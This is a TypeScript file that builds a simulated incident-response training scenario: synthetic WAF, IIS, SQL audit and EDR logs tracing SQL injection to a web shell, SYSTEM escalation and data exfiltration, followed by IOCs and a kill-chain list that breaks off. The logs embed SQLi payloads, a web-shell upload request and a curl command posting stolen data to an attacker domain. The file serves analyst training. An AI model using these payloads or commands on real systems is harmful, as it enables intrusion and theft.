import type { ScenarioBundle, TelemetryEvent, IOC, ScenarioQuestion } from "@/lib/sim/types";

/**
 * SQL Injection → Web Shell → Server Compromise (ADVANCED)
 *
 * Web-application attack chain against an internet-facing IIS storefront that sits
 * behind an ALB with AWS WAF in front of it. Four telemetry planes are involved:
 *
 *   waf          — AWS WAF (regional web ACL on the ALB)
 *   siem         — IIS W3C access log, ingested into the Sentinel W3CIISLog table
 *   db_monitor   — Microsoft SQL Server Audit (sys.fn_get_audit_file columns)
 *   edr          — Microsoft Defender for Endpoint on the web server itself
 *
 * Privilege chain (see SPEC rule 1):
 *   evt_01  4672 proves the ShopPortal app-pool identity holds SeImpersonatePrivilege.
 *   evt_11  the .aspx web shell is written by w3wp.exe, i.e. by the app pool itself.
 *   evt_12  the first shell command runs as IIS APPPOOL\ShopPortal at MEDIUM integrity.
 *   evt_13  only after PrintSpoofer abuses the privilege from evt_01 does anything
 *           run as NT AUTHORITY\SYSTEM. The shell is never SYSTEM on its own.
 */
export function buildWebShellRceScenario(scenarioId = "webshell-sqli-2026"): ScenarioBundle {
  const B = new Date("2026-03-17T09:00:00Z").getTime();
  const T = (ms: number) => new Date(B + ms).toISOString();
  const MIN = 60_000;

  const web = { hostname: "WEB-SHOP-01", ip: "10.40.12.21", site: "shop.cryotech.com" };
  const db = { hostname: "SQL-SHOP-02", ip: "10.40.12.55", database: "ShopDB" };
  const albIp = "10.40.12.9";

  // Attacker infrastructure — the source IP rotates across the probing phase.
  const atkA = "45.146.130.72";
  const atkB = "45.146.130.88";
  const atkC = "91.242.229.35"; // the IP that lands the successful injection
  const c2Ip = "194.26.29.114";
  const c2Dom = "cdn-shopassets.link";

  // Authorized quarterly external ASV scan — Qualys cloud scanner range.
  const scannerIp = "64.39.106.131";

  const shellHash = "3f9c1a7d52b84e06c9d13f7a48b25e0c7d61a9f34b820e5dc17a63f9081b4e2d";
  const spoofHash = "d41c7b930a2e58f6b71d904c3e85a2f716c09db45f823a1e97d604cb2a1f7e35";

  const webAclArn =
    "arn:aws:wafv2:eu-west-1:481920347761:regional/webacl/shop-prod-waf/8f3c2b1a-64d7-4e10-9b52-7c31ad0e5f62";
  const albId = "481920347761-app/shop-prod-alb/1a2b3c4d5e6f7a8b";

  const uaPython = "python-requests/2.31.0";
  const uaQualys = "Mozilla/5.0 (compatible; Qualys/9.6.4; +https://www.qualys.com/scanner)";
  const uaChrome =
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36";

  const events: TelemetryEvent[] = [
    // ── CONTEXT: what the web server's service account is allowed to do ────────
    {
      id: "evt_01_apppool_privileges",
      ts: T(-45 * MIN),
      source: "windows_security",
      vendor: "Windows Security",
      event_type: "auth_success",
      hostname: web.hostname,
      severity: "informational",
      description:
        "The ShopPortal IIS application pool started on WEB-SHOP-01 and its worker process logged on as the virtual account IIS APPPOOL\\ShopPortal. Note which privileges the service logon was granted — this is the ceiling of what anything running inside the web application can do.",
      raw: {
        "winlog.event_id": "4672",
        "winlog.channel": "Security",
        "winlog.provider_name": "Microsoft-Windows-Security-Auditing",
        "winlog.computer_name": "WEB-SHOP-01.cryotech.com",
        "winlog.record_id": "8841207",
        "winlog.event_data.SubjectUserSid": "S-1-5-82-1274839021-3315088842-4194903328-2971184652-1108255477",
        "winlog.event_data.SubjectUserName": "ShopPortal",
        "winlog.event_data.SubjectDomainName": "IIS APPPOOL",
        "winlog.event_data.SubjectLogonId": "0x9C41A2",
        "winlog.event_data.PrivilegeList":
          "SeAssignPrimaryTokenPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeIncreaseQuotaPrivilege\n\t\t\tSeChangeNotifyPrivilege\n\t\t\tSeCreateGlobalPrivilege\n\t\t\tSeIncreaseWorkingSetPrivilege",
        "event.code": "4672",
        "event.action": "special-privileges-assigned",
        "event.outcome": "success",
        "host.name": "WEB-SHOP-01",
        "user.name": "IIS APPPOOL\\ShopPortal",
        "logon.type": "5",
      },
    },

    // ── RECON: attacker content-discovery sweep against the storefront ─────────
    {
      id: "evt_02_recon_sweep",
      ts: T(0),
      source: "siem",
      vendor: "Microsoft Sentinel",
      event_type: "http_request",
      hostname: web.hostname,
      src_ip: atkA,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "low",
      mitre_technique: "T1595.003",
      mitre_tactic: "Reconnaissance",
      network: { url: `https://${web.site}/.git/config`, domain: web.site, method: "GET", status: 404, user_agent: uaPython },
      description:
        "IIS access log (W3CIISLog) for shop.cryotech.com. This record is representative of 214 requests received in 96 seconds against paths that do not exist on the site — /.git/config, /backup.zip, /admin, /web.config.bak, /api/v1/swagger.json. Every one returned 404, and the client identified itself as python-requests.",
      raw: {
        TimeGenerated: "2026-03-17T09:00:00.412Z",
        Computer: "WEB-SHOP-01.cryotech.com",
        sSiteName: "SHOPPORTAL",
        sComputerName: "WEB-SHOP-01",
        sIP: "10.40.12.21",
        sPort: "443",
        csMethod: "GET",
        csUriStem: "/.git/config",
        csUriQuery: "-",
        csUserName: "-",
        cIP: albIp,
        csHost: "shop.cryotech.com",
        csUserAgent: uaPython,
        csReferer: "-",
        scStatus: "404",
        scSubStatus: "0",
        scWin32Status: "2",
        scBytes: "1245",
        csBytes: "319",
        TimeTaken: "4",
        csVersion: "HTTP/1.1",
        Type: "W3CIISLog",
      },
    },

    // ── NOISE: the authorized quarterly ASV scan trips the same signatures ─────
    {
      id: "evt_03_authorized_scan",
      ts: T(6 * MIN),
      source: "waf",
      vendor: "AWS WAF",
      event_type: "waf_block",
      hostname: web.hostname,
      src_ip: scannerIp,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "low",
      expected_verdict: "fp",
      fp_explanation:
        "64.39.106.131 is inside the Qualys cloud scanner range that Cryotech whitelisted for its quarterly PCI ASV external scan (change record CHG-2026-0311, window 09:00–11:00 UTC on 17 Mar). The scanner fires the whole SQLi payload catalogue at every parameter it finds and the WAF blocks all of it — high volume, uniform payloads, a single source IP that never rotates, and a self-identifying User-Agent. It is scanning noise, not exploitation.",
      network: { url: `https://${web.site}/products/search.aspx`, domain: web.site, method: "GET", status: 403, user_agent: uaQualys },
      description:
        "AWS WAF blocked a SQL injection payload from 64.39.106.131. Representative of a sustained burst from this single address across many parameters and paths.",
      raw: {
        formatVersion: 1,
        timestamp: 1773738360000,
        webaclId: webAclArn,
        terminatingRuleId: "AWS-AWSManagedRulesSQLiRuleSet",
        terminatingRuleType: "MANAGED_RULE_GROUP",
        action: "BLOCK",
        "terminatingRuleMatchDetails[0].conditionType": "SQL_INJECTION",
        "terminatingRuleMatchDetails[0].sensitivityLevel": "LOW",
        "terminatingRuleMatchDetails[0].location": "QUERY_STRING",
        "terminatingRuleMatchDetails[0].matchedData": "['\\'', 'or', '1', '=', '1']",
        httpSourceName: "ALB",
        httpSourceId: albId,
        "ruleGroupList[0].ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet",
        "ruleGroupList[0].terminatingRule.ruleId": "SQLi_QUERYARGUMENTS",
        "ruleGroupList[0].terminatingRule.action": "BLOCK",
        "ruleGroupList[0].nonTerminatingMatchingRules": "[]",
        "ruleGroupList[0].excludedRules": "null",
        rateBasedRuleList: "[]",
        nonTerminatingMatchingRules: "[]",
        requestHeadersInserted: "null",
        responseCodeSent: "403",
        "httpRequest.clientIp": scannerIp,
        "httpRequest.country": "US",
        "httpRequest.httpMethod": "GET",
        "httpRequest.uri": "/products/search.aspx",
        "httpRequest.args": "q=test%27%20or%201%3D1--",
        "httpRequest.httpVersion": "HTTP/1.1",
        "httpRequest.requestId": "1-67d84a08-2f19c4b76d0e5a3819bb4c72",
        "httpRequest.headers[0].name": "Host",
        "httpRequest.headers[0].value": "shop.cryotech.com",
        "httpRequest.headers[1].name": "User-Agent",
        "httpRequest.headers[1].value": uaQualys,
        "labels[0].name": "awswaf:managed:aws:sql-database:SQLi_QueryArguments",
      },
    },

    // ── PROBE 1: naive injection in the query string — blocked ────────────────
    {
      id: "evt_04_waf_block_tautology",
      ts: T(19 * MIN),
      source: "waf",
      vendor: "AWS WAF",
      event_type: "waf_block",
      hostname: web.hostname,
      src_ip: atkA,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "medium",
      mitre_technique: "T1190",
      mitre_tactic: "Initial Access",
      network: { url: `https://${web.site}/products/search.aspx`, domain: web.site, method: "GET", status: 403, user_agent: uaPython },
      description:
        "AWS WAF blocked a tautology injection (q=widget' OR 1=1--) on the search endpoint from 45.146.130.72 — the same address that ran the 404 sweep 19 minutes earlier. The managed SQLi rule set matched on the query string and returned 403.",
      raw: {
        formatVersion: 1,
        timestamp: 1773739140000,
        webaclId: webAclArn,
        terminatingRuleId: "AWS-AWSManagedRulesSQLiRuleSet",
        terminatingRuleType: "MANAGED_RULE_GROUP",
        action: "BLOCK",
        "terminatingRuleMatchDetails[0].conditionType": "SQL_INJECTION",
        "terminatingRuleMatchDetails[0].sensitivityLevel": "LOW",
        "terminatingRuleMatchDetails[0].location": "QUERY_STRING",
        "terminatingRuleMatchDetails[0].matchedData": "['\\'', 'or', '1', '=', '1']",
        httpSourceName: "ALB",
        httpSourceId: albId,
        "ruleGroupList[0].ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet",
        "ruleGroupList[0].terminatingRule.ruleId": "SQLi_QUERYARGUMENTS",
        "ruleGroupList[0].terminatingRule.action": "BLOCK",
        "ruleGroupList[0].nonTerminatingMatchingRules": "[]",
        "ruleGroupList[0].excludedRules": "null",
        rateBasedRuleList: "[]",
        nonTerminatingMatchingRules: "[]",
        responseCodeSent: "403",
        "httpRequest.clientIp": atkA,
        "httpRequest.country": "NL",
        "httpRequest.httpMethod": "GET",
        "httpRequest.uri": "/products/search.aspx",
        "httpRequest.args": "q=widget%27%20OR%201%3D1--",
        "httpRequest.httpVersion": "HTTP/1.1",
        "httpRequest.requestId": "1-67d84be4-91af35d2c7043b6e2d18aa50",
        "httpRequest.headers[0].name": "Host",
        "httpRequest.headers[0].value": "shop.cryotech.com",
        "httpRequest.headers[1].name": "User-Agent",
        "httpRequest.headers[1].value": uaPython,
        "labels[0].name": "awswaf:managed:aws:sql-database:SQLi_QueryArguments",
      },
    },

    // ── PROBE 2: UNION attempt from a rotated address — also blocked ──────────
    {
      id: "evt_05_waf_block_union",
      ts: T(24 * MIN),
      source: "waf",
      vendor: "AWS WAF",
      event_type: "waf_block",
      hostname: web.hostname,
      src_ip: atkB,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "medium",
      mitre_technique: "T1190",
      mitre_tactic: "Initial Access",
      network: { url: `https://${web.site}/products/detail.aspx`, domain: web.site, method: "GET", status: 403, user_agent: uaPython },
      description:
        "AWS WAF blocked a UNION SELECT payload on the product-detail endpoint. The source is 45.146.130.88 — a different address in the same /24 as the previous probe, with the same User-Agent.",
      raw: {
        formatVersion: 1,
        timestamp: 1773739440000,
        webaclId: webAclArn,
        terminatingRuleId: "AWS-AWSManagedRulesSQLiRuleSet",
        terminatingRuleType: "MANAGED_RULE_GROUP",
        action: "BLOCK",
        "terminatingRuleMatchDetails[0].conditionType": "SQL_INJECTION",
        "terminatingRuleMatchDetails[0].sensitivityLevel": "LOW",
        "terminatingRuleMatchDetails[0].location": "QUERY_STRING",
        "terminatingRuleMatchDetails[0].matchedData": "['union', 'select', 'from']",
        httpSourceName: "ALB",
        httpSourceId: albId,
        "ruleGroupList[0].ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet",
        "ruleGroupList[0].terminatingRule.ruleId": "SQLi_QUERYARGUMENTS",
        "ruleGroupList[0].terminatingRule.action": "BLOCK",
        "ruleGroupList[0].nonTerminatingMatchingRules": "[]",
        "ruleGroupList[0].excludedRules": "null",
        rateBasedRuleList: "[]",
        nonTerminatingMatchingRules: "[]",
        responseCodeSent: "403",
        "httpRequest.clientIp": atkB,
        "httpRequest.country": "NL",
        "httpRequest.httpMethod": "GET",
        "httpRequest.uri": "/products/detail.aspx",
        "httpRequest.args": "id=4471%20UNION%20SELECT%20name%2C1%2C1%20FROM%20sys.tables--",
        "httpRequest.httpVersion": "HTTP/1.1",
        "httpRequest.requestId": "1-67d84d10-58c2ba9147ef30d16a7c2298",
        "httpRequest.headers[0].name": "Host",
        "httpRequest.headers[0].value": "shop.cryotech.com",
        "httpRequest.headers[1].name": "User-Agent",
        "httpRequest.headers[1].value": uaPython,
        "labels[0].name": "awswaf:managed:aws:sql-database:SQLi_QueryArguments",
      },
    },

    // ── THE ONE THAT LANDS: injection past the 8 KB body-inspection window ────
    {
      id: "evt_06_waf_allow_oversize_body",
      ts: T(38 * MIN),
      source: "waf",
      vendor: "AWS WAF",
      event_type: "waf_allow",
      hostname: web.hostname,
      src_ip: atkC,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "high",
      mitre_technique: "T1190",
      mitre_tactic: "Initial Access",
      network: { url: `https://${web.site}/api/v2/inventory/lookup`, domain: web.site, method: "POST", user_agent: uaChrome },
      description:
        "AWS WAF passed a 12,438-byte POST to the inventory lookup API from 91.242.229.35, a third source address now presenting a normal browser User-Agent. Read the oversizeFields value and the excludedRules entry together before deciding whether this request was inspected at all.",
      raw: {
        formatVersion: 1,
        timestamp: 1773740280000,
        webaclId: webAclArn,
        terminatingRuleId: "Default_Action",
        terminatingRuleType: "REGULAR",
        action: "ALLOW",
        "terminatingRuleMatchDetails": "[]",
        httpSourceName: "ALB",
        httpSourceId: albId,
        "oversizeFields[0]": "REQUEST_BODY",
        "ruleGroupList[0].ruleGroupId": "AWS#AWSManagedRulesCommonRuleSet",
        "ruleGroupList[0].terminatingRule": "null",
        "ruleGroupList[0].nonTerminatingMatchingRules": "[]",
        "ruleGroupList[0].excludedRules[0].exclusionType": "EXCLUDED_AS_COUNT",
        "ruleGroupList[0].excludedRules[0].ruleId": "SizeRestrictions_BODY",
        "ruleGroupList[1].ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet",
        "ruleGroupList[1].terminatingRule": "null",
        "ruleGroupList[1].nonTerminatingMatchingRules": "[]",
        "ruleGroupList[1].excludedRules": "null",
        rateBasedRuleList: "[]",
        nonTerminatingMatchingRules: "[]",
        requestHeadersInserted: "null",
        responseCodeSent: "null",
        "httpRequest.clientIp": atkC,
        "httpRequest.country": "RU",
        "httpRequest.httpMethod": "POST",
        "httpRequest.uri": "/api/v2/inventory/lookup",
        "httpRequest.args": "",
        "httpRequest.httpVersion": "HTTP/1.1",
        "httpRequest.requestId": "1-67d85058-3ea71c9f4d206b8853fa1107",
        "httpRequest.headers[0].name": "Host",
        "httpRequest.headers[0].value": "shop.cryotech.com",
        "httpRequest.headers[1].name": "User-Agent",
        "httpRequest.headers[1].value": uaChrome,
        "httpRequest.headers[2].name": "Content-Type",
        "httpRequest.headers[2].value": "application/json",
        "httpRequest.headers[3].name": "Content-Length",
        "httpRequest.headers[3].value": "12438",
        "labels[0].name": "awswaf:managed:aws:core-rule-set:SizeRestrictions_Body",
      },
    },

    // ── SAME REQUEST, WEB SERVER SIDE ────────────────────────────────────────
    {
      id: "evt_07_iis_lookup_200",
      ts: T(38 * MIN + 11_000),
      source: "siem",
      vendor: "Microsoft Sentinel",
      event_type: "http_request",
      hostname: web.hostname,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "high",
      mitre_technique: "T1190",
      mitre_tactic: "Initial Access",
      network: { url: `https://${web.site}/api/v2/inventory/lookup`, domain: web.site, method: "POST", status: 200, user_agent: uaChrome },
      description:
        "IIS answered the inventory lookup POST with 200 and returned 3.3 MB — for an endpoint whose normal response is under 2 KB. TimeTaken was 11,284 ms. Note the cIP value: the site sits behind an ALB, so IIS records the load balancer, not the caller.",
      raw: {
        TimeGenerated: "2026-03-17T09:38:11.284Z",
        Computer: "WEB-SHOP-01.cryotech.com",
        sSiteName: "SHOPPORTAL",
        sComputerName: "WEB-SHOP-01",
        sIP: "10.40.12.21",
        sPort: "443",
        csMethod: "POST",
        csUriStem: "/api/v2/inventory/lookup",
        csUriQuery: "-",
        csUserName: "-",
        cIP: albIp,
        csHost: "shop.cryotech.com",
        csUserAgent: uaChrome,
        csReferer: "-",
        scStatus: "200",
        scSubStatus: "0",
        scWin32Status: "0",
        scBytes: "3312486",
        csBytes: "12438",
        TimeTaken: "11284",
        csVersion: "HTTP/1.1",
        Type: "W3CIISLog",
      },
    },

    // ── DATABASE: the injected UNION executes with the app's own permissions ──
    {
      id: "evt_08_db_customer_dump",
      ts: T(38 * MIN + 11_000),
      source: "db_monitor",
      vendor: "Microsoft SQL Server Audit",
      event_type: "db_query",
      hostname: db.hostname,
      src_ip: web.ip,
      dst_ip: db.ip,
      dst_port: 1433,
      protocol: "tcp",
      severity: "critical",
      mitre_technique: "T1213",
      mitre_tactic: "Collection",
      description:
        "SQL Server Audit recorded the statement the web application actually sent. The inventory lookup query has been extended with a UNION against dbo.Customers and returned 42,318 rows. The statement ran as shopportal_app, the application's own login — the injection inherits exactly the permissions the web tier already had, no more.",
      raw: {
        event_time: "2026-03-17 09:38:11.2840000",
        sequence_number: "1",
        action_id: "SL",
        succeeded: "1",
        class_type: "OB",
        session_id: "94",
        server_principal_name: "shopportal_app",
        database_principal_name: "shopportal_app",
        server_instance_name: "SQL-SHOP-02\\MSSQLSERVER",
        database_name: "ShopDB",
        schema_name: "dbo",
        object_name: "Customers",
        statement:
          "SELECT Sku, QtyOnHand FROM dbo.Inventory WHERE Sku = '' UNION ALL SELECT CustomerId, Email FROM dbo.Customers--'",
        client_ip: "10.40.12.21",
        application_name: ".Net SqlClient Data Provider",
        host_name: "WEB-SHOP-01",
        duration_milliseconds: "11041",
        response_rows: "42318",
        affected_rows: "0",
        audit_file_offset: "58880",
        file_name: "F:\\SQLAudit\\ShopDB_Audit_A47C_1.sqlaudit",
      },
    },

    // ── DATABASE: application secrets read out of a settings table ────────────
    {
      id: "evt_09_db_appsettings",
      ts: T(44 * MIN),
      source: "db_monitor",
      vendor: "Microsoft SQL Server Audit",
      event_type: "db_query",
      hostname: db.hostname,
      src_ip: web.ip,
      dst_ip: db.ip,
      dst_port: 1433,
      protocol: "tcp",
      severity: "critical",
      mitre_technique: "T1552",
      mitre_tactic: "Credential Access",
      description:
        "Six minutes later the same injection point was used to read dbo.AppSettings, a 37-row configuration table. One of the rows it returned is the shared key that the site's legacy deployment handler (/admin/content/upload.ashx) checks before accepting a file.",
      raw: {
        event_time: "2026-03-17 09:44:00.6120000",
        sequence_number: "1",
        action_id: "SL",
        succeeded: "1",
        class_type: "OB",
        session_id: "97",
        server_principal_name: "shopportal_app",
        database_principal_name: "shopportal_app",
        server_instance_name: "SQL-SHOP-02\\MSSQLSERVER",
        database_name: "ShopDB",
        schema_name: "dbo",
        object_name: "AppSettings",
        statement:
          "SELECT Sku, QtyOnHand FROM dbo.Inventory WHERE Sku = '' UNION ALL SELECT SettingKey, SettingValue FROM dbo.AppSettings--'",
        client_ip: "10.40.12.21",
        application_name: ".Net SqlClient Data Provider",
        host_name: "WEB-SHOP-01",
        duration_milliseconds: "38",
        response_rows: "37",
        affected_rows: "0",
        audit_file_offset: "61952",
        file_name: "F:\\SQLAudit\\ShopDB_Audit_A47C_1.sqlaudit",
      },
    },

    // ── DELIVERY: the stolen key is used against the legacy upload handler ────
    {
      id: "evt_10_iis_upload_201",
      ts: T(47 * MIN),
      source: "siem",
      vendor: "Microsoft Sentinel",
      event_type: "http_request",
      hostname: web.hostname,
      dst_ip: web.ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "critical",
      mitre_technique: "T1505.003",
      mitre_tactic: "Persistence",
      network: { url: `https://${web.site}/admin/content/upload.ashx`, domain: web.site, method: "POST", status: 201, user_agent: uaChrome },
      description:
        "A POST to the legacy deployment handler was accepted with 201. The query string carries the deploy key value that came out of dbo.AppSettings three minutes earlier, plus a target path inside the site's static asset folder and a filename ending in .aspx.",
      raw: {
        TimeGenerated: "2026-03-17T09:47:00.905Z",
        Computer: "WEB-SHOP-01.cryotech.com",
        sSiteName: "SHOPPORTAL",
        sComputerName: "WEB-SHOP-01",
        sIP: "10.40.12.21",
        sPort: "443",
        csMethod: "POST",
        csUriStem: "/admin/content/upload.ashx",
        csUriQuery:
          "key=d0f4a1c8-7b23-4e19-9a56-cc81e0b47f3d&target=assets%2fjs%2fvendor&name=bootstrap.bundle.aspx",
        csUserName: "-",
        cIP: albIp,
        csHost: "shop.cryotech.com",
        csUserAgent: uaChrome,
        csReferer: "-",
        scStatus: "201",
        scSubStatus: "0",
        scWin32Status: "0",
        scBytes: "412",
        csBytes: "9614",
        TimeTaken: "268",
        csVersion: "HTTP/1.1",
        Type: "W3CIISLog",
      },
    },

    // ── PERSISTENCE: the shell lands on disk, written by the app pool itself ──
    {
      id: "evt_11_webshell_written",
      ts: T(47 * MIN + 1_000),
      source: "edr",
      vendor: "Microsoft Defender for Endpoint",
      event_type: "file_create",
      hostname: web.hostname,
      severity: "critical",
      mitre_technique: "T1505.003",
      mitre_tactic: "Persistence",
      file: {
        name: "bootstrap.bundle.aspx",
        path: "C:\\inetpub\\wwwroot\\shop\\assets\\js\\vendor\\bootstrap.bundle.aspx",
        sha256: shellHash,
        size: 8917,
        extension: "aspx",
      },
      description:
        "Defender for Endpoint recorded w3wp.exe creating an .aspx file inside the site's JavaScript vendor directory one second after the 201 upload response. The writing identity is the application pool account, which is why no administrator credential appears anywhere in this chain.",
      raw: {
        Timestamp: "2026-03-17T09:47:01.133Z",
        DeviceName: "web-shop-01.cryotech.com",
        DeviceId: "a9f4c21b7d08e3561ca4907fb2e8d3170c95a4e2",
        ActionType: "FileCreated",
        FileName: "bootstrap.bundle.aspx",
        FolderPath: "C:\\inetpub\\wwwroot\\shop\\assets\\js\\vendor",
        SHA256: shellHash,
        FileSize: "8917",
        InitiatingProcessFileName: "w3wp.exe",
        InitiatingProcessFolderPath: "C:\\Windows\\System32\\inetsrv",
        InitiatingProcessCommandLine: "w3wp.exe -ap \"ShopPortal\" -v \"v4.0\" -c \"C:\\Windows\\...\\aspnet.config\"",
        InitiatingProcessId: "6188",
        InitiatingProcessAccountDomain: "IIS APPPOOL",
        InitiatingProcessAccountName: "ShopPortal",
        InitiatingProcessIntegrityLevel: "Medium",
        InitiatingProcessTokenElevation: "TokenElevationTypeDefault",
        ReportId: "44127",
      },
    },

    // ── EXECUTION: first command through the shell, at the app pool's level ───
    {
      id: "evt_12_webshell_command",
      ts: T(52 * MIN),
      source: "edr",
      vendor: "Microsoft Defender for Endpoint",
      event_type: "process_create",
      hostname: web.hostname,
      severity: "critical",
      mitre_technique: "T1059.003",
      mitre_tactic: "Execution",
      process: {
        name: "cmd.exe",
        pid: 7304,
        path: "C:\\Windows\\System32\\cmd.exe",
        parent_name: "w3wp.exe",
        parent_pid: 6188,
        cmdline: "cmd.exe /c whoami /priv & hostname & ipconfig /all",
        user: "IIS APPPOOL\\ShopPortal",
        integrity: "medium",
      },
      description:
        "w3wp.exe spawned cmd.exe on WEB-SHOP-01 — a web worker process should never be a parent of a command interpreter. Compare the account and integrity level here with the next event before you describe the attacker's privileges.",
      raw: {
        Timestamp: "2026-03-17T09:52:00.740Z",
        DeviceName: "web-shop-01.cryotech.com",
        DeviceId: "a9f4c21b7d08e3561ca4907fb2e8d3170c95a4e2",
        ActionType: "ProcessCreated",
        FileName: "cmd.exe",
        FolderPath: "C:\\Windows\\System32\\cmd.exe",
        ProcessCommandLine: "cmd.exe /c whoami /priv & hostname & ipconfig /all",
        ProcessId: "7304",
        ProcessIntegrityLevel: "Medium",
        ProcessTokenElevation: "TokenElevationTypeDefault",
        AccountDomain: "IIS APPPOOL",
        AccountName: "ShopPortal",
        AccountSid: "S-1-5-82-1274839021-3315088842-4194903328-2971184652-1108255477",
        InitiatingProcessFileName: "w3wp.exe",
        InitiatingProcessFolderPath: "C:\\Windows\\System32\\inetsrv",
        InitiatingProcessId: "6188",
        InitiatingProcessAccountDomain: "IIS APPPOOL",
        InitiatingProcessAccountName: "ShopPortal",
        InitiatingProcessIntegrityLevel: "Medium",
        ReportId: "44503",
      },
    },

    // ── ESCALATION: SeImpersonatePrivilege from evt_01 is cashed in ───────────
    {
      id: "evt_13_printspoofer_system",
      ts: T(58 * MIN),
      source: "edr",
      vendor: "Microsoft Defender for Endpoint",
      event_type: "privilege_escalation",
      hostname: web.hostname,
      severity: "critical",
      mitre_technique: "T1134.001",
      mitre_tactic: "Privilege Escalation",
      process: {
        name: "cmd.exe",
        pid: 8016,
        path: "C:\\Windows\\System32\\cmd.exe",
        parent_name: "srv.exe",
        parent_pid: 7952,
        cmdline: "cmd.exe",
        user: "NT AUTHORITY\\SYSTEM",
        integrity: "system",
      },
      description:
        "An unsigned binary named srv.exe, dropped into the same vendor asset folder as the web shell and launched from it, produced a child cmd.exe running as NT AUTHORITY\\SYSTEM at System integrity. The parent is still the application pool account — the escalation itself is what changed the token, and evt_01 shows the privilege that made it possible.",
      raw: {
        Timestamp: "2026-03-17T09:58:00.318Z",
        DeviceName: "web-shop-01.cryotech.com",
        DeviceId: "a9f4c21b7d08e3561ca4907fb2e8d3170c95a4e2",
        ActionType: "ProcessCreated",
        FileName: "cmd.exe",
        FolderPath: "C:\\Windows\\System32\\cmd.exe",
        ProcessCommandLine: "cmd.exe",
        ProcessId: "8016",
        ProcessIntegrityLevel: "System",
        ProcessTokenElevation: "TokenElevationTypeDefault",
        AccountDomain: "NT AUTHORITY",
        AccountName: "SYSTEM",
        AccountSid: "S-1-5-18",
        InitiatingProcessFileName: "srv.exe",
        InitiatingProcessFolderPath: "C:\\inetpub\\wwwroot\\shop\\assets\\js\\vendor",
        InitiatingProcessCommandLine: "srv.exe -i -c \"cmd.exe\"",
        InitiatingProcessId: "7952",
        InitiatingProcessSHA256: spoofHash,
        InitiatingProcessAccountDomain: "IIS APPPOOL",
        InitiatingProcessAccountName: "ShopPortal",
        InitiatingProcessIntegrityLevel: "Medium",
        InitiatingProcessTokenElevation: "TokenElevationTypeDefault",
        ReportId: "44861",
      },
    },

    // ── EXFIL: the SYSTEM shell ships the staged data out ────────────────────
    {
      id: "evt_14_outbound_upload",
      ts: T(64 * MIN),
      source: "edr",
      vendor: "Microsoft Defender for Endpoint",
      event_type: "net_connection",
      hostname: web.hostname,
      src_ip: web.ip,
      dst_ip: c2Ip,
      dst_port: 443,
      protocol: "tcp",
      severity: "critical",
      mitre_technique: "T1041",
      mitre_tactic: "Exfiltration",
      network: { url: `https://${c2Dom}/u`, domain: c2Dom, bytes_out: 3312486, bytes_in: 214 },
      description:
        "curl.exe, running as SYSTEM under the escalated shell, uploaded a staged archive from the web server's temp directory to cdn-shopassets.link (194.26.29.114). The outbound byte count matches the size of the response the injected UNION produced at 09:38.",
      raw: {
        Timestamp: "2026-03-17T10:04:00.552Z",
        DeviceName: "web-shop-01.cryotech.com",
        DeviceId: "a9f4c21b7d08e3561ca4907fb2e8d3170c95a4e2",
        ActionType: "ConnectionSuccess",
        LocalIP: "10.40.12.21",
        LocalPort: "50188",
        RemoteIP: c2Ip,
        RemotePort: "443",
        RemoteUrl: `https://${c2Dom}/u`,
        Protocol: "Tcp",
        InitiatingProcessFileName: "curl.exe",
        InitiatingProcessFolderPath: "C:\\Windows\\System32\\curl.exe",
        InitiatingProcessCommandLine:
          "curl.exe -k -s -X POST --data-binary @C:\\Windows\\Temp\\ib.dat https://cdn-shopassets.link/u",
        InitiatingProcessId: "8244",
        InitiatingProcessAccountDomain: "NT AUTHORITY",
        InitiatingProcessAccountName: "SYSTEM",
        InitiatingProcessIntegrityLevel: "System",
        InitiatingProcessParentFileName: "cmd.exe",
        InitiatingProcessParentId: "8016",
        ReportId: "45119",
      },
    },
  ];

  const iocs: IOC[] = [
    { type: "ip", value: atkA, first_seen: T(0), last_seen: T(19 * MIN), reputation: "malicious", tags: ["external", "scanning"] },
    { type: "ip", value: atkB, first_seen: T(24 * MIN), last_seen: T(24 * MIN), reputation: "malicious", tags: ["external", "scanning"] },
    { type: "ip", value: atkC, first_seen: T(38 * MIN), last_seen: T(47 * MIN), reputation: "malicious", tags: ["external", "exploitation"] },
    { type: "ip", value: c2Ip, first_seen: T(64 * MIN), last_seen: T(64 * MIN), reputation: "malicious", tags: ["c2", "external"] },
    { type: "domain", value: c2Dom, first_seen: T(64 * MIN), last_seen: T(64 * MIN), reputation: "malicious", tags: ["c2", "external"] },
    { type: "sha256", value: shellHash, first_seen: T(47 * MIN), reputation: "malicious", tags: ["webroot", "aspx"] },
    { type: "sha256", value: spoofHash, first_seen: T(58 * MIN), reputation: "malicious", tags: ["unsigned", "dropped-binary"] },
    { type: "url", value: `https://${web.site}/admin/content/upload.ashx`, first_seen: T(47 * MIN), reputation: "suspicious", tags: ["legacy-handler", "unauthenticated-key"] },
    { type: "host", value: web.hostname, first_seen: T(38 * MIN), reputation: "malicious", tags: ["compromised", "internet-facing"] },
    { type: "user", value: "IIS APPPOOL\\ShopPortal", first_seen: T(47 * MIN), reputation: "suspicious", tags: ["service-account", "abused"] },
  ];

  const killchain = [
    { ts: T(0), phase: "Reconnaissance", action: "214 content-discovery requests from 45.146.130.72 — all 404, python-requests User-Agent" },
    { ts: T(19 * MIN), phase: "Initial Access — Blocked", action: "AWS WAF blocks a tautology injection on /products/search.aspx (403)" },
    { ts: T(24 * MIN), phase: "Initial Access — Blocked", action: "AWS WAF blocks a UNION SELECT on /products/detail.aspx from a rotated IP (403)" },
    { ts: T(38 * MIN), phase: "Initial Access — Success", action: "Injection in a 12,438-byte JSON body passes uninspected; IIS returns 200 with 3.3 MB" },
